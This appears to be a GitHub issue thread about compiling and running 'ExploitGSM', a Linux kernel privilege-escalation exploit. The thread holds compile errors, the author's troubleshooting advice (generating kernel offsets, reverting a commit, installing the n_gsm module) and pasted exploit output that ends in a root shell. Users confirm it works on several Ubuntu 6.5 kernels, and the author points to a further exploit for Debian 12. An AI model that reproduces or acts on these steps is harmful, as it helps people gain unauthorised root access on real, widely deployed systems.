Compile issue in ubuntu

[kronostitanplay]

error during make.

error: field ‘config’ has incomplete type
  228 |     struct gsm_dlci_config config;
      |                            ^~~~~~
In file included from /usr/include/x86_64-linux-gnu/asm/ioctl.h:1,
                 from /usr/include/linux/ioctl.h:5,
                 from /usr/include/linux/gsmmux.h:6,
                 from /home/kronosplay/Desktop/ExploitGSM/ExploitGSM_6_5/main.c:7:
/home/kronosplay/Desktop/ExploitGSM/ExploitGSM_6_5/main.c: In function ‘thread_setconf_dlci’:
/home/kronosplay/Desktop/ExploitGSM/ExploitGSM_6_5/main.c:54:46: error: invalid application of ‘sizeof’ to incomplete type ‘struct gsm_dlci_config’
   54 | #define GSMIOC_SETCONF_DLCI     _IOW('G', 8, struct gsm_dlci_config)
      |                                              ^~~~~~
/home/kronosplay/Desktop/ExploitGSM/ExploitGSM_6_5/main.c:1137:42: note: in expansion of macro ‘GSMIOC_SETCONF_DLCI’
 1137 |     args->retval = ioctl(args->fd_input, GSMIOC_SETCONF_DLCI, &args->config);
      |                                          ^~~~~~~~~~~~~~~~~~~
/home/kronosplay/Desktop/ExploitGSM/ExploitGSM_6_5/main.c: In function ‘thread_getconf_dlci’:
/home/kronosplay/Desktop/ExploitGSM/ExploitGSM_6_5/main.c:53:47: error: invalid application of ‘sizeof’ to incomplete type ‘struct gsm_dlci_config’
   53 | #define GSMIOC_GETCONF_DLCI     _IOWR('G', 7, struct gsm_dlci_config)
      |                                               ^~~~~~
/home/kronosplay/Desktop/ExploitGSM/ExploitGSM_6_5/main.c:1146:42: note: in expansion of macro ‘GSMIOC_GETCONF_DLCI’
 1146 |     args->retval = ioctl(args->fd_input, GSMIOC_GETCONF_DLCI, &args->config);
      |                                          ^~~~~~~~~~~~~~~~~~~
gmake[2]: *** [CMakeFiles/ExploitGSM.dir/build.make:76: CMakeFiles/ExploitGSM.dir/main.c.o] Error 1
gmake[1]: *** [CMakeFiles/Makefile2:83: CMakeFiles/ExploitGSM.dir/all] Error 2

[faveoled]

what's your kernel version?

[kronostitanplay]

6.5.0-26-generic #26~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Tue Mar 12 10:22:43 UTC 2 x86_64 x86_64 x86_64 GNU/Linux

[xpliz]

Can't compile in ubuntu 6.5.0-17 nor 6.5.0-23. Same goes for Debian 12.

Removing last commit from ./ExploitGSM_6_5/main.c "works", and exploit compiles but will not run/do anything.

./ExploitGSM ubuntu
Error find kernel 

[YuriiCrimson]

Can't compile in ubuntu 6.5.0-17 nor 6.5.0-23. Same goes for Debian 12.

Removing last commit from ./ExploitGSM_6_5/main.c "works", and exploit compiles but will not run/do anything.

./ExploitGSM ubuntu
Error find kernel 

You should use Offset generator for adding kernel offsets

[faveoled]

These lines should be changed with offset generator output (run it as root, change distro_name as needed): https://github.com/YuriiCrimson/ExploitGSM/blob/0cc21d22ef08c4935d9c0e064f17a2d8fb81dbc4/ExploitGSM_6_5/main.c#L368-L371 Worked on my KDE Neon, main.c commit reverted:

neon@neon:~/Downloads/ExploitGSM/ExploitGSM_6_5$ ./ExploitGSM ubuntu
permissible spray -> 500 
begin try leak startup_xen! 
startup_xen leaked address  -> ffffffff8ea933a0 
text leaked address         -> ffffffff8c400000 
lockdep_map_size     -> 32 
spinlock_t_size      -> 4 
mutex_size           -> 32 
tty port             -> 376 
tty buffhead         -> 136 
dead                 -> 524 
waiting setconf dlci thread 
Wait 3 sec for ending kernel work execution 
We get root, spawn shell 
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@neon:/root# ^C        
neon@neon:~/Downloads/ExploitGSM/ExploitGSM_6_5$ uname -a
Linux neon 6.5.0-21-generic #21~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb  9 13:32:52 UTC 2 x86_64 x86_64 x86_64 GNU/Linux

[kronostitanplay]

After update kernel offset.

permissible spray -> 500 
begin try leak startup_xen! 
startup_xen leaked address  -> ffffffffaaa933a0 
text leaked address         -> ffffffffa8400000 
lockdep_map_size     -> 32 
spinlock_t_size      -> 4 
mutex_size           -> 32 
tty port             -> 376 
tty buffhead         -> 136 
dead                 -> 524 
Error set line discipline N_GSM, Invalid argument 

[YuriiCrimson]

After update kernel offset.

permissible spray -> 500 
begin try leak startup_xen! 
startup_xen leaked address  -> ffffffffaaa933a0 
text leaked address         -> ffffffffa8400000 
lockdep_map_size     -> 32 
spinlock_t_size      -> 4 
mutex_size           -> 32 
tty port             -> 376 
tty buffhead         -> 136 
dead                 -> 524 
Error set line discipline N_GSM, Invalid argument 

Because you not have n_gsm kernel module. Install extra kernel modules

[kronostitanplay]

After update kernel offset.

permissible spray -> 500 
begin try leak startup_xen! 
startup_xen leaked address  -> ffffffffaaa933a0 
text leaked address         -> ffffffffa8400000 
lockdep_map_size     -> 32 
spinlock_t_size      -> 4 
mutex_size           -> 32 
tty port             -> 376 
tty buffhead         -> 136 
dead                 -> 524 
Error set line discipline N_GSM, Invalid argument 

Because you not have n_gsm kernel module. Install extra kernel modules

Thanks it's works

permissible spray -> 500 
begin try leak startup_xen! 
startup_xen leaked address  -> ffffffff9e0933a0 
text leaked address         -> ffffffff9ba00000 
lockdep_map_size     -> 32 
spinlock_t_size      -> 4 
mutex_size           -> 32 
tty port             -> 376 
tty buffhead         -> 136 
dead                 -> 524 
waiting setconf dlci thread 
Wait 3 sec for ending kernel work execution 
We get root, spawn shell 
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

[YuriiCrimson]

Try my another exploit for Debian 12

[faveoled]

@kronostitanplay Could you update your system to see if it works on 6.5.0-27?

[psreverttoself]

@kronostitanplay Could you update your system to see if it works on 6.5.0-27?

Hi, I have confirmed this works on Ubuntu 22 LTS with kernel 6.5.0-27.

[kronostitanplay]

@kronostitanplay Could you update your system to see if it works on 6.5.0-27?

Yes! it's working